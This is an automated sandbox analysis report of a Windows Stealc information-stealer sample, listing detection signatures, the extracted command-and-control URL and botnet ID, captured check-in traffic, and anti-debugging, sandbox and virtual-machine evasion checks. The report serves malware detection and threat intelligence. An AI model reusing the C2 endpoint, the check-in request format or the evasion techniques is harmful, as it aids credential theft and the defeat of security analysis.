Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532850
MD5:10f4beb1c5f54bb1d754f56785e14563
SHA1:c52cb5d5917e28fd1d886ddbe410bb673617e16c
SHA256:58faf6bf840c606c3c8852692bb7f9ae649fa927707f5546d55e68ba6c4fe8b2
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5176 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 10F4BEB1C5F54BB1D754F56785E14563)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2214050807.0000000004BD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2254739103.0000000000838000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5176JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5176JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.de0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-14T01:00:20.306858+020020442431Malware Command and Control Activity Detected192.168.2.649717185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.de0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00DEC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00DE9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00DE7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00DE9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00DF8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00DF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00DEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00DF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00DEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00DF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEDE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49717 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 43 46 46 33 39 42 42 33 35 38 33 34 31 39 37 30 35 32 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 2d 2d 0d 0a Data Ascii: ------JKECGHCFIJDAAKFHJJDHContent-Disposition: form-data; name="hwid"4ACFF39BB3583419705248------JKECGHCFIJDAAKFHJJDHContent-Disposition: form-data; name="build"doma------JKECGHCFIJDAAKFHJJDH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00DE4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 43 46 46 33 39 42 42 33 35 38 33 34 31 39 37 30 35 32 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 2d 2d 0d 0a Data Ascii: ------JKECGHCFIJDAAKFHJJDHContent-Disposition: form-data; name="hwid"4ACFF39BB3583419705248------JKECGHCFIJDAAKFHJJDHContent-Disposition: form-data; name="build"doma------JKECGHCFIJDAAKFHJJDH--
                Source: file.exe, 00000000.00000002.2254739103.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2254739103.0000000000896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php-
                Source: file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
                Source: file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
                Source: file.exe, 00000000.00000002.2254739103.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37p

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A90_2_011AF9A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011351D00_2_011351D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A73390_2_011A7339
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108BB500_2_0108BB50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D83670_2_010D8367
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A229B0_2_011A229B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0119FAA20_2_0119FAA2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F52ED0_2_010F52ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011115D40_2_011115D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A3DC10_2_011A3DC1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B14180_2_011B1418
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CBC610_2_010CBC61
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01060CEB0_2_01060CEB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B2E2B0_2_011B2E2B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011ADEA30_2_011ADEA3
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00DE45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: siqapmbg ZLIB complexity 0.9949494235985533
                Source: file.exe, 00000000.00000003.2214050807.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00DF8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00DF3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ZEDEI543.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1854976 > 1048576
                Source: file.exeStatic PE information: Raw size of siqapmbg is bigger than: 0x100000 < 0x19ec00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.de0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;siqapmbg:EW;dgzgzabs:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;siqapmbg:EW;dgzgzabs:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DF9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c55c8 should be: 0x1d04b1
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: siqapmbg
                Source: file.exeStatic PE information: section name: dgzgzabs
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0123292D push ebx; mov dword ptr [esp], ecx0_2_0123297C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126F932 push ecx; mov dword ptr [esp], 1DDB1E86h0_2_0126F957
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126F932 push 16BEE169h; mov dword ptr [esp], eax0_2_0126F9BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126F932 push 353121A9h; mov dword ptr [esp], eax0_2_0126F9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BA91F push 720EEB00h; mov dword ptr [esp], eax0_2_012BA95E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01294965 push 7ADD2895h; mov dword ptr [esp], eax0_2_0129498A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01294965 push 2D3D02FCh; mov dword ptr [esp], esp0_2_012949AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0121A17B push 3308ABD7h; mov dword ptr [esp], edx0_2_0121A1C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0123994D push ebp; mov dword ptr [esp], ebx0_2_0123995E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0123994D push edx; mov dword ptr [esp], ecx0_2_01239969
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E81BF push edx; mov dword ptr [esp], 7F7F8C1Fh0_2_011E81E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01274984 push ebp; mov dword ptr [esp], esi0_2_0127498F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 6CC68142h; mov dword ptr [esp], edx0_2_011AF9C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 09DFD4D4h; mov dword ptr [esp], eax0_2_011AFA55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push esi; mov dword ptr [esp], ebx0_2_011AFAA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push ecx; mov dword ptr [esp], edx0_2_011AFAEA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 1CFDA9D4h; mov dword ptr [esp], ebp0_2_011AFB35
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 3E7A94C6h; mov dword ptr [esp], esi0_2_011AFBBB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push edi; mov dword ptr [esp], ecx0_2_011AFBEB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 019FD919h; mov dword ptr [esp], edi0_2_011AFC22
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 590119ACh; mov dword ptr [esp], esi0_2_011AFD7A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 1E727620h; mov dword ptr [esp], edi0_2_011AFD82
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push ebx; mov dword ptr [esp], edx0_2_011AFDC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push esi; mov dword ptr [esp], 6FBBAE36h0_2_011AFDC4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 4B2E5D49h; mov dword ptr [esp], eax0_2_011AFE7B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 4863E733h; mov dword ptr [esp], ebp0_2_011AFED9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 3FA4C0C6h; mov dword ptr [esp], esp0_2_011AFEE1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 1F7F5316h; mov dword ptr [esp], edx0_2_011AFEFB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push edi; mov dword ptr [esp], ebp0_2_011AFF3A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push edi; mov dword ptr [esp], edx0_2_011B002B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011AF9A9 push 6948C7A9h; mov dword ptr [esp], edx0_2_011B0040
                Source: file.exeStatic PE information: section name: siqapmbg entropy: 7.954494499000927

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DF9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13567
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10423E0 second address: 10423E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8C62 second address: 11B8C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3FAC75ECC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8FDA second address: 11B8FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8FDE second address: 11B9001 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3FAC75ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007F3FAC75ECC6h 0x00000011 je 00007F3FAC75ECC6h 0x00000017 popad 0x00000018 popad 0x00000019 js 00007F3FAC75ECDAh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9001 second address: 11B900B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3FACB96B26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B952B second address: 11B952F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B952F second address: 11B9533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9533 second address: 11B9539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD199 second address: 11BD1A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACB96B2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
